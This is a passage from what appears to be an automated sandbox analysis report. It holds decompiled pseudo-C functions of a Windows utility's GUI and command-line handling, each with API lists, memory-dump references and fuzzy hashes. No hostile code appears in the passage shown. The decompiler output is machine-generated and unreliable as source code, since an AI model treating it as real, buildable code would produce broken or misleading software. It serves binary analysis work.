                                                                                                                                                                    					 *0x412394 = _t7;
                                                                                                                                                                    					return 1;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					return 1;
                                                                                                                                                                    				}
                                                                                                                                                                    			}






                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1386444988-0
                                                                                                                                                                    • Opcode ID: d000923bd1a2c8bc84f0207edb9b446423912ab7819a2e97a848d13e141c1bba
                                                                                                                                                                    • Instruction ID: 89add42b0ad0b7d68bf63fa0eb6c53c6f7d1aed99d4242a64f88595bbbc02ed0
                                                                                                                                                                    • Opcode Fuzzy Hash: d000923bd1a2c8bc84f0207edb9b446423912ab7819a2e97a848d13e141c1bba
                                                                                                                                                                    • Instruction Fuzzy Hash: 3EF08232650360FBE7207FA4AD46BDA7A90E744B12F20457AF644F50E1C2F915658B8C
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E00401712(struct HWND__* __eax, void* __edx, void* __edi, void* __eflags) {
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				struct HWND__* _t11;
                                                                                                                                                                    				struct HWND__* _t12;
                                                                                                                                                                    				struct HWND__* _t13;
                                                                                                                                                                    				void* _t16;
                                                                                                                                                                    
                                                                                                                                                                    				_t16 = __edi;
                                                                                                                                                                    				_t12 = __eax;
                                                                                                                                                                    				 *((intOrPtr*)(__edi + 0x10)) = __eax;
                                                                                                                                                                    				GetClientRect(__eax, __edi + 0x24);
                                                                                                                                                                    				E00403F55(__edi + 0x14);
                                                                                                                                                                    				_t13 = GetWindow(GetWindow(_t12, 5), 0);
                                                                                                                                                                    				while(1) {
                                                                                                                                                                    					E0040169B(_t9, _t16);
                                                                                                                                                                    					_t11 = GetWindow(_t13, 2);
                                                                                                                                                                    					_t13 = _t11;
                                                                                                                                                                    					if(_t13 == 0) {
                                                                                                                                                                    						break;
                                                                                                                                                                    					}
                                                                                                                                                                    					_t9 = _t13;
                                                                                                                                                                    				}
                                                                                                                                                                    				return _t11;
                                                                                                                                                                    			}









                                                                                                                                                                    APIs
                                                                                                                                                                    • GetClientRect.USER32 ref: 0040171E
                                                                                                                                                                      • Part of subcall function 00403F55: free.MSVCRT(00000000,0040BC79,?,00000000,0040C0A1,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0040E23C,00000000), ref: 00403F5C
                                                                                                                                                                    • GetWindow.USER32(?,00000005), ref: 00401737
                                                                                                                                                                    • GetWindow.USER32(00000000), ref: 0040173A
                                                                                                                                                                      • Part of subcall function 0040169B: GetWindowRect.USER32 ref: 004016AD
                                                                                                                                                                      • Part of subcall function 0040169B: MapWindowPoints.USER32 ref: 004016BE
                                                                                                                                                                      • Part of subcall function 0040169B: free.MSVCRT(?,?,?), ref: 004016DB
                                                                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 0040174C
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Window$Rectfree$ClientPoints
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3078297017-0
                                                                                                                                                                    • Opcode ID: 3a4aa1592c158fe3daa17fad5146983a8383157a6360d7d68cc82a07b6ab73eb
                                                                                                                                                                    • Instruction ID: 3c878aa69d1487aa6e46661a708a7683238dcb4edfadfd8cd86f08b3a4e73e8d
                                                                                                                                                                    • Opcode Fuzzy Hash: 3a4aa1592c158fe3daa17fad5146983a8383157a6360d7d68cc82a07b6ab73eb
                                                                                                                                                                    • Instruction Fuzzy Hash: D7E0EDA170071667D6106BB59DC5A6666ACBB08341F000436B60AF7592DBB8AD148BA8
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 84%
                                                                                                                                                                    			E0040B31A(char* __ecx, void* __edx, short _a4, short _a8) {
                                                                                                                                                                    				char _v518;
                                                                                                                                                                    				char _v1028;
                                                                                                                                                                    				char _v1092;
                                                                                                                                                                    				signed int _v1100;
                                                                                                                                                                    				char _v1172;
                                                                                                                                                                    				char* _v1176;
                                                                                                                                                                    				intOrPtr _v1184;
                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				int _t74;
                                                                                                                                                                    				void* _t93;
                                                                                                                                                                    				intOrPtr _t113;
                                                                                                                                                                    				void* _t114;
                                                                                                                                                                    				char* _t116;
                                                                                                                                                                    				intOrPtr _t132;
                                                                                                                                                                    
                                                                                                                                                                    				_t114 = __edx;
                                                                                                                                                                    				_t112 = __ecx;
                                                                                                                                                                    				_push(_t108);
                                                                                                                                                                    				_t116 = __ecx;
                                                                                                                                                                    				_v1176 = __ecx;
                                                                                                                                                                    				if(_a4 == 0 || _a4 == 1) {
                                                                                                                                                                    					_t142 = _a8 - 0x9c62;
                                                                                                                                                                    					if(_a8 == 0x9c62) {
                                                                                                                                                                    						_t108 = _t116;
                                                                                                                                                                    						_t74 = E0040AD95(_t116, _t142);
                                                                                                                                                                    					}
                                                                                                                                                                    					_t143 = _a8 - 0x9c5f;
                                                                                                                                                                    					if(_a8 == 0x9c5f) {
                                                                                                                                                                    						_t74 = E0040AE4D(_t74, _t112, _t114, _t116, _t143);
                                                                                                                                                                    					}
                                                                                                                                                                    					if(_a8 == 0x9c5e) {
                                                                                                                                                                    						 *( *((intOrPtr*)(_t116 + 0x698)) + 0x10) =  *( *((intOrPtr*)(_t116 + 0x698)) + 0x10) ^ 0x00000001;
                                                                                                                                                                    						_t108 = 0;
                                                                                                                                                                    						E0040A1DC(0, _t112, _t116, 0);
                                                                                                                                                                    						_t74 = E004080C5( *((intOrPtr*)(_t116 + 0x69c)), _t112);
                                                                                                                                                                    					}
                                                                                                                                                                    					if(_a8 == 0x9c5c) {
                                                                                                                                                                    						 *( *((intOrPtr*)(_t116 + 0x698)) + 0xc) =  *( *((intOrPtr*)(_t116 + 0x698)) + 0xc) ^ 0x00000001;
                                                                                                                                                                    						_t108 = 0;
                                                                                                                                                                    						E0040A1DC(0, _t112, _t116, 0);
                                                                                                                                                                    						E0040A3BF(_t116);
                                                                                                                                                                    						_t74 = InvalidateRect( *( *((intOrPtr*)(_t116 + 0x69c)) + 0x2ac), 0, 0);
                                                                                                                                                                    					}
                                                                                                                                                                    					if(_a8 == 0x9c42) {
                                                                                                                                                                    						_t74 = DestroyWindow( *(_t116 + 0x208));
                                                                                                                                                                    					}
                                                                                                                                                                    					if(_a8 == 0x9c49) {
                                                                                                                                                                    						_t108 = _t116;
                                                                                                                                                                    						_t74 = E0040B0C2(_t116);
                                                                                                                                                                    					}
                                                                                                                                                                    					if(_a8 == 0x9c56) {
                                                                                                                                                                    						 *( *((intOrPtr*)(_t116 + 0x698)) + 8) =  *( *((intOrPtr*)(_t116 + 0x698)) + 8) ^ 0x00000001;
                                                                                                                                                                    						_t108 = 0;
                                                                                                                                                                    						E0040A1DC(0, _t112, _t116, 0);
                                                                                                                                                                    						_t74 = E0040A6FF(_t116);
                                                                                                                                                                    					}
                                                                                                                                                                    					if(_a8 == 0x9c44) {
                                                                                                                                                                    						_t74 = E00401BDC(_t116, 0x415);
                                                                                                                                                                    					}
                                                                                                                                                                    					if(_a8 == 0x9c43) {
                                                                                                                                                                    						E0040133A( &_v1092);
                                                                                                                                                                    						_v1092 = 0x410428;
                                                                                                                                                                    						E00401000( &_v1028, _t112, 0x412290);
                                                                                                                                                                    						_t108 =  &_v518;
                                                                                                                                                                    						E00401000( &_v518, _t112, 0x4122c4);
                                                                                                                                                                    						_t132 = _v1176;
                                                                                                                                                                    						_push( *((intOrPtr*)(_t132 + 0x208)));
                                                                                                                                                                    						_push( &_v1092);
                                                                                                                                                                    						_t93 = 0x70;
                                                                                                                                                                    						E0040152F(_t93);
                                                                                                                                                                    						E004077CB( *((intOrPtr*)(_t132 + 0x69c)));
                                                                                                                                                                    						_t74 = E00401357( &_v1100);
                                                                                                                                                                    						_t116 = _t132;
                                                                                                                                                                    					}
                                                                                                                                                                    					_t154 = _a8 - 0x9c41;
                                                                                                                                                                    					if(_a8 == 0x9c41) {
                                                                                                                                                                    						_t74 = E0040AF7D(_t112, _t114, _t116, _t154);
                                                                                                                                                                    					}
                                                                                                                                                                    					if(_a8 != 0x9c47) {
                                                                                                                                                                    						L27:
                                                                                                                                                                    						__eflags = _a8 - 0x9c4f;
                                                                                                                                                                    						if(_a8 != 0x9c4f) {
                                                                                                                                                                    							L31:
                                                                                                                                                                    							__eflags = _a8 - 0x9c48;
                                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                                    								_t74 = E0040AF02(_t108, _t114, _t116, _t116, __eflags);
                                                                                                                                                                    							}
                                                                                                                                                                    							__eflags = _a8 - 0x9c45;
                                                                                                                                                                    							if(_a8 == 0x9c45) {
                                                                                                                                                                    								 *( *((intOrPtr*)(_t116 + 0x698)) + 4) =  *( *((intOrPtr*)(_t116 + 0x698)) + 4) ^ 0x00000001;
                                                                                                                                                                    								__eflags = 0;
                                                                                                                                                                    								E0040A1DC(0, _t112, _t116, 0);
                                                                                                                                                                    								_t74 = E0040A6FF(_t116);
                                                                                                                                                                    							}
                                                                                                                                                                    							__eflags = _a8 - 0x9c46;
                                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                                    								_t74 = E0040B21F(_t112, _t114, _t116, __eflags, 0);
                                                                                                                                                                    							}
                                                                                                                                                                    							__eflags = _a8 - 0x9c4a;
                                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                                    								_t74 = E0040B21F(_t112, _t114, _t116, __eflags, 1);
                                                                                                                                                                    							}
                                                                                                                                                                    							__eflags = _a8 - 0x9c65;
                                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                                    								_t74 = E0040B054(_t116, __eflags);
                                                                                                                                                                    							}
                                                                                                                                                                    							__eflags = _a8 - 0x9c4b;
                                                                                                                                                                    							if(_a8 == 0x9c4b) {
                                                                                                                                                                    								E0040133A( &_v1172);
                                                                                                                                                                    								_v1100 = _v1100 & 0x00000000;
                                                                                                                                                                    								_v1172 = 0x40f7a8;
                                                                                                                                                                    								E00403584( *((intOrPtr*)( *((intOrPtr*)(_t116 + 0x69c)) + 0x2e4)),  &_v1172,  *(_t116 + 0x208),  *( *((intOrPtr*)(_t116 + 0x69c)) + 0x2ac));
                                                                                                                                                                    								_t82 = _v1184;
                                                                                                                                                                    								_t113 =  *((intOrPtr*)(_v1184 + 0x698));
                                                                                                                                                                    								__eflags =  *((intOrPtr*)(_t113 + 0x224));
                                                                                                                                                                    								if( *((intOrPtr*)(_t113 + 0x224)) != 0) {
                                                                                                                                                                    									__eflags =  *((intOrPtr*)(_t113 + 0x2228)) - 2;
                                                                                                                                                                    									if( *((intOrPtr*)(_t113 + 0x2228)) == 2) {
                                                                                                                                                                    										E0040B00A(_t82);
                                                                                                                                                                    									}
                                                                                                                                                                    								}
                                                                                                                                                                    								_v1172 = 0x40f7a8;
                                                                                                                                                                    								_t74 = E00401357( &_v1172);
                                                                                                                                                                    								_t116 = _v1176;
                                                                                                                                                                    							}
                                                                                                                                                                    							__eflags = _a8 - 0x9c4c;
                                                                                                                                                                    							if(_a8 == 0x9c4c) {
                                                                                                                                                                    								_t74 = E00407E76( *((intOrPtr*)(_t116 + 0x69c)));
                                                                                                                                                                    							}
                                                                                                                                                                    							__eflags = _a8 - 0x9c58;
                                                                                                                                                                    							if(_a8 == 0x9c58) {
                                                                                                                                                                    								_t74 = E00407EBC( *((intOrPtr*)(_t116 + 0x69c)));
                                                                                                                                                                    							}
                                                                                                                                                                    							__eflags = _a8 - 0x9c4e;
                                                                                                                                                                    							if(_a8 == 0x9c4e) {
                                                                                                                                                                    								_t74 = E004097F2( *(_t116 + 0x208),  *((intOrPtr*)(_t116 + 0x69c)));
                                                                                                                                                                    							}
                                                                                                                                                                    							goto L52;
                                                                                                                                                                    						}
                                                                                                                                                                    						_t88 =  *((intOrPtr*)(_t116 + 0x69c));
                                                                                                                                                                    						__eflags =  *((intOrPtr*)(_t88 + 0x2e8));
                                                                                                                                                                    						if( *((intOrPtr*)(_t88 + 0x2e8)) == 0) {
                                                                                                                                                                    							_t74 = E004077D8(_t88, 0xffffffff, 0, 2);
                                                                                                                                                                    							goto L31;
                                                                                                                                                                    						}
                                                                                                                                                                    						_push(0xf000);
                                                                                                                                                                    						_push(0x1000);
                                                                                                                                                                    						goto L25;
                                                                                                                                                                    					} else {
                                                                                                                                                                    						_t88 =  *((intOrPtr*)(_t116 + 0x69c));
                                                                                                                                                                    						if( *((intOrPtr*)( *((intOrPtr*)(_t116 + 0x69c)) + 0x2e8)) == 0) {
                                                                                                                                                                    							_t74 = E004077D8(_t88, 0xffffffff, 2, 2);
                                                                                                                                                                    							goto L27;
                                                                                                                                                                    						}
                                                                                                                                                                    						_push(0xf000);
                                                                                                                                                                    						_push(0x2000);
                                                                                                                                                                    						L25:
                                                                                                                                                                    						_push(0xffffffff);
                                                                                                                                                                    						_t74 = E004077D8(_t88);
                                                                                                                                                                    						goto L52;
                                                                                                                                                                    					}
                                                                                                                                                                    				} else {
                                                                                                                                                                    					L52:
                                                                                                                                                                    					return _t74;
                                                                                                                                                                    				}
                                                                                                                                                                    			}



















                                                                                                                                                                    0x0040b402
                                                                                                                                                                    0x0040b40b
                                                                                                                                                                    0x0040b40b
                                                                                                                                                                    0x0040b416
                                                                                                                                                                    0x0040b41c
                                                                                                                                                                    0x0040b42d
                                                                                                                                                                    0x0040b435
                                                                                                                                                                    0x0040b43a
                                                                                                                                                                    0x0040b446
                                                                                                                                                                    0x0040b44b
                                                                                                                                                                    0x0040b44f
                                                                                                                                                                    0x0040b459
                                                                                                                                                                    0x0040b45c
                                                                                                                                                                    0x0040b45d
                                                                                                                                                                    0x0040b468
                                                                                                                                                                    0x0040b471
                                                                                                                                                                    0x0040b476
                                                                                                                                                                    0x0040b476
                                                                                                                                                                    0x0040b478
                                                                                                                                                                    0x0040b47e
                                                                                                                                                                    0x0040b482
                                                                                                                                                                    0x0040b482
                                                                                                                                                                    0x0040b48d
                                                                                                                                                                    0x0040b4bf
                                                                                                                                                                    0x0040b4bf
                                                                                                                                                                    0x0040b4c5
                                                                                                                                                                    0x0040b4ed
                                                                                                                                                                    0x0040b4ed
                                                                                                                                                                    0x0040b4f3
                                                                                                                                                                    0x0040b4f7
                                                                                                                                                                    0x0040b4f7
                                                                                                                                                                    0x0040b4fc
                                                                                                                                                                    0x0040b502
                                                                                                                                                                    0x0040b50a
                                                                                                                                                                    0x0040b50e
                                                                                                                                                                    0x0040b512
                                                                                                                                                                    0x0040b517
                                                                                                                                                                    0x0040b517
                                                                                                                                                                    0x0040b51c
                                                                                                                                                                    0x0040b522
                                                                                                                                                                    0x0040b528
                                                                                                                                                                    0x0040b528
                                                                                                                                                                    0x0040b52d
                                                                                                                                                                    0x0040b533
                                                                                                                                                                    0x0040b539
                                                                                                                                                                    0x0040b539
                                                                                                                                                                    0x0040b53e
                                                                                                                                                                    0x0040b544
                                                                                                                                                                    0x0040b548
                                                                                                                                                                    0x0040b548
                                                                                                                                                                    0x0040b54d
                                                                                                                                                                    0x0040b553
                                                                                                                                                                    0x0040b559
                                                                                                                                                                    0x0040b564
                                                                                                                                                                    0x0040b56e
                                                                                                                                                                    0x0040b588
                                                                                                                                                                    0x0040b58d
                                                                                                                                                                    0x0040b591
                                                                                                                                                                    0x0040b597
                                                                                                                                                                    0x0040b59e
                                                                                                                                                                    0x0040b5a0
                                                                                                                                                                    0x0040b5a7
                                                                                                                                                                    0x0040b5a9
                                                                                                                                                                    0x0040b5a9
                                                                                                                                                                    0x0040b5a7
                                                                                                                                                                    0x0040b5b2
                                                                                                                                                                    0x0040b5b6
                                                                                                                                                                    0x0040b5bb
                                                                                                                                                                    0x0040b5bb
                                                                                                                                                                    0x0040b5bf
                                                                                                                                                                    0x0040b5c5
                                                                                                                                                                    0x0040b5cd
                                                                                                                                                                    0x0040b5cd
                                                                                                                                                                    0x0040b5d2
                                                                                                                                                                    0x0040b5d8
                                                                                                                                                                    0x0040b5e0
                                                                                                                                                                    0x0040b5e0
                                                                                                                                                                    0x0040b5e5
                                                                                                                                                                    0x0040b5eb
                                                                                                                                                                    0x0040b5f9
                                                                                                                                                                    0x0040b5f9
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x0040b5eb
                                                                                                                                                                    0x0040b4c7
                                                                                                                                                                    0x0040b4cd
                                                                                                                                                                    0x0040b4d4
                                                                                                                                                                    0x0040b4e8
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x0040b4e8
                                                                                                                                                                    0x0040b4d6
                                                                                                                                                                    0x0040b4db
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x0040b48f
                                                                                                                                                                    0x0040b48f
                                                                                                                                                                    0x0040b49c
                                                                                                                                                                    0x0040b4ba
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x0040b4ba
                                                                                                                                                                    0x0040b49e
                                                                                                                                                                    0x0040b4a3
                                                                                                                                                                    0x0040b4a8
                                                                                                                                                                    0x0040b4a8
                                                                                                                                                                    0x0040b4aa
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x0040b4aa
                                                                                                                                                                    0x0040b5fe
                                                                                                                                                                    0x0040b5fe
                                                                                                                                                                    0x0040b604
                                                                                                                                                                    0x0040b604

                                                                                                                                                                    APIs
                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000000), ref: 0040B3B3
                                                                                                                                                                    • DestroyWindow.USER32(?), ref: 0040B3C7
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DestroyInvalidateRectWindow
                                                                                                                                                                    • String ID: 33@
                                                                                                                                                                    • API String ID: 724544332-1541121659
                                                                                                                                                                    • Opcode ID: 7ad5f6ad311df91c89693e5a2d2bb114cf057b36f9e353a504ef30fe770d82e2
                                                                                                                                                                    • Instruction ID: f9cdce4f37102d27210f5083c80b5f01578b93f7cfdd6efd8ac2da961f31085b
                                                                                                                                                                    • Opcode Fuzzy Hash: 7ad5f6ad311df91c89693e5a2d2bb114cf057b36f9e353a504ef30fe770d82e2
                                                                                                                                                                    • Instruction Fuzzy Hash: 35714630600205AACB24BF16C845A5DB3A5EB40338F14C57AF4686B6E1D77D9D958BCE
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 78%
                                                                                                                                                                    			E0040A4C2(void* __eax) {
                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				short* __esi;
                                                                                                                                                                    				void* _t24;
                                                                                                                                                                    				int _t27;
                                                                                                                                                                    				void* _t36;
                                                                                                                                                                    				intOrPtr* _t43;
                                                                                                                                                                    
                                                                                                                                                                    				_t36 = __eax;
                                                                                                                                                                    				if( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x6c0)) + 0x30)) <= 0) {
                                                                                                                                                                    					L11:
                                                                                                                                                                    					E0040528C();
                                                                                                                                                                    					 *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x69c)) + 0x3c)) = 0;
                                                                                                                                                                    					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x69c)))) + 0x68))();
                                                                                                                                                                    					_t24 = E004065C4( *((intOrPtr*)(_t36 + 0x6c0)), L"/nosort");
                                                                                                                                                                    					__eflags = _t24 - 0xffffffff;
                                                                                                                                                                    					if(_t24 != 0xffffffff) {
                                                                                                                                                                    						L15:
                                                                                                                                                                    						goto L1;
                                                                                                                                                                    					}
                                                                                                                                                                    					__eflags =  *0x4131d4; // 0x1
                                                                                                                                                                    					_t43 =  *((intOrPtr*)(_t36 + 0x69c));
                                                                                                                                                                    					if(__eflags == 0) {
                                                                                                                                                                    						 *0x4131d8 =  *((intOrPtr*)(_t43 + 0x2d8));
                                                                                                                                                                    						 *0x4131d4 = 1;
                                                                                                                                                                    					}
                                                                                                                                                                    					_t27 =  *((intOrPtr*)( *_t43 + 0x6c))();
                                                                                                                                                                    					qsort(E00407588(_t43, 0),  *(_t43 + 0x3c), _t27, E00409EA2);
                                                                                                                                                                    					goto L15;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					do {
                                                                                                                                                                    						__ecx = __esi;
                                                                                                                                                                    						__eax = E004065EE(__eax, __esi, L"/sort");
                                                                                                                                                                    						__eflags = __eax;
                                                                                                                                                                    						if(__eax != 0) {
                                                                                                                                                                    							__eax =  *((intOrPtr*)(__edi + 0x6c0));
                                                                                                                                                                    							_t4 = __esi + 1; // 0x1
                                                                                                                                                                    							__ecx = _t4;
                                                                                                                                                                    							__eflags = __ecx -  *((intOrPtr*)(__eax + 0x30));
                                                                                                                                                                    							if(__ecx >=  *((intOrPtr*)(__eax + 0x30))) {
                                                                                                                                                                    								__ecx = 0x40f454;
                                                                                                                                                                    							} else {
                                                                                                                                                                    								__ecx = __eax;
                                                                                                                                                                    							}
                                                                                                                                                                    							__eflags =  *__ecx - 0x7e;
                                                                                                                                                                    							__eax =  *((intOrPtr*)(__edi + 0x69c));
                                                                                                                                                                    							if(__eflags != 0) {
                                                                                                                                                                    							} else {
                                                                                                                                                                    								_push(1);
                                                                                                                                                                    								__ecx = __ecx + 2;
                                                                                                                                                                    							}
                                                                                                                                                                    							_push(__ecx);
                                                                                                                                                                    							__eax = E0040A084(__eax, __eflags);
                                                                                                                                                                    						}
                                                                                                                                                                    						__eax =  *((intOrPtr*)(__edi + 0x6c0));
                                                                                                                                                                    						__esi = __esi + 1;
                                                                                                                                                                    						__eflags = __esi -  *((intOrPtr*)(__eax + 0x30));
                                                                                                                                                                    					} while (__esi <  *((intOrPtr*)(__eax + 0x30)));
                                                                                                                                                                    					goto L11;
                                                                                                                                                                    				}
                                                                                                                                                                    				L1:
                                                                                                                                                                    				return SetCursor( *0x412390);
                                                                                                                                                                    			}











                                                                                                                                                                    APIs
                                                                                                                                                                    • qsort.MSVCRT ref: 0040A591
                                                                                                                                                                      • Part of subcall function 004065EE: _wcsicmp.MSVCRT ref: 00406604
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _wcsicmpqsort
                                                                                                                                                                    • String ID: /nosort$/sort
                                                                                                                                                                    • API String ID: 1579243037-1578091866
                                                                                                                                                                    • Opcode ID: 124884d5dc6559089fffaca0d7121966e37f59272275963d4074e0ad8fb9bc0b
                                                                                                                                                                    • Instruction ID: 6b5ec6eb7515bc088160010cb6f8a328b32efe940b1a3fb6a30810c5b3da645c
                                                                                                                                                                    • Opcode Fuzzy Hash: 124884d5dc6559089fffaca0d7121966e37f59272275963d4074e0ad8fb9bc0b
                                                                                                                                                                    • Instruction Fuzzy Hash: 8821D370600600FFC714EF26C885DA6B3A5FB44328B01017EE915BB6E1C779BC608B9A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 70%
                                                                                                                                                                    			E00405E81(intOrPtr _a4, intOrPtr _a8, void* _a12) {
                                                                                                                                                                    				void* _v8;
                                                                                                                                                                    				void* _v26;
                                                                                                                                                                    				void _v28;
                                                                                                                                                                    				void* _t24;
                                                                                                                                                                    				void* _t25;
                                                                                                                                                                    				void* _t35;
                                                                                                                                                                    				signed int _t38;
                                                                                                                                                                    				signed int _t42;
                                                                                                                                                                    				void* _t44;
                                                                                                                                                                    				void* _t45;
                                                                                                                                                                    
                                                                                                                                                                    				_t24 = _a12;
                                                                                                                                                                    				_t45 = _t44 - 0x18;
                                                                                                                                                                    				_t42 = 0;
                                                                                                                                                                    				 *_t24 = 0;
                                                                                                                                                                    				if(_a8 <= 0) {
                                                                                                                                                                    					_t25 = 0;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					_t38 = 0;
                                                                                                                                                                    					_t35 = 0;
                                                                                                                                                                    					if(_a8 > 0) {
                                                                                                                                                                    						_v8 = _t24;
                                                                                                                                                                    						while(1) {
                                                                                                                                                                    							_v28 = _v28 & 0x00000000;
                                                                                                                                                                    							asm("stosd");
                                                                                                                                                                    							asm("stosd");
                                                                                                                                                                    							asm("stosd");
                                                                                                                                                                    							asm("stosd");
                                                                                                                                                                    							asm("stosw");
                                                                                                                                                                    							_push( *(_t35 + _a4) & 0x000000ff);
                                                                                                                                                                    							_push(L"%2.2X ");
                                                                                                                                                                    							_push(0xa);
                                                                                                                                                                    							_push( &_v28);
                                                                                                                                                                    							L0040DFD6();
                                                                                                                                                                    							_t38 = _t42;
                                                                                                                                                                    							memcpy(_v8,  &_v28, 6);
                                                                                                                                                                    							_t13 = _t42 + 3; // 0x3
                                                                                                                                                                    							_t45 = _t45 + 0x1c;
                                                                                                                                                                    							if(_t13 >= 0x2000) {
                                                                                                                                                                    								break;
                                                                                                                                                                    							}
                                                                                                                                                                    							_v8 = _v8 + 6;
                                                                                                                                                                    							_t35 = _t35 + 1;
                                                                                                                                                                    							_t42 = _t42 + 3;
                                                                                                                                                                    							if(_t35 < _a8) {
                                                                                                                                                                    								continue;
                                                                                                                                                                    							}
                                                                                                                                                                    							break;
                                                                                                                                                                    						}
                                                                                                                                                                    						_t24 = _a12;
                                                                                                                                                                    					}
                                                                                                                                                                    					 *(_t24 + 4 + _t38 * 2) =  *(_t24 + 4 + _t38 * 2) & 0x00000000;
                                                                                                                                                                    					_t25 = 1;
                                                                                                                                                                    				}
                                                                                                                                                                    				return _t25;
                                                                                                                                                                    			}














                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _snwprintfmemcpy
                                                                                                                                                                    • String ID: %2.2X
                                                                                                                                                                    • API String ID: 2789212964-323797159
                                                                                                                                                                    • Opcode ID: 5646eba8dd4affce10f05f382f775d9093a619cdef628270f3a0be2943da427e
                                                                                                                                                                    • Instruction ID: 09870db8f10325833ee0949f0b54b8ee796ec7cfb255f8a941d73aa4e244bb5d
                                                                                                                                                                    • Opcode Fuzzy Hash: 5646eba8dd4affce10f05f382f775d9093a619cdef628270f3a0be2943da427e
                                                                                                                                                                    • Instruction Fuzzy Hash: 33118232904609BFDB10DFE8C8869AF73B9FB44314F108477ED11E7181E6789A158BD5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E00405DCD(intOrPtr* __ebx, intOrPtr __ecx, wchar_t* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                    				intOrPtr _v44;
                                                                                                                                                                    				intOrPtr _v48;
                                                                                                                                                                    				signed int _v52;
                                                                                                                                                                    				signed int _v60;
                                                                                                                                                                    				intOrPtr _v64;
                                                                                                                                                                    				wchar_t* _v68;
                                                                                                                                                                    				intOrPtr _v72;
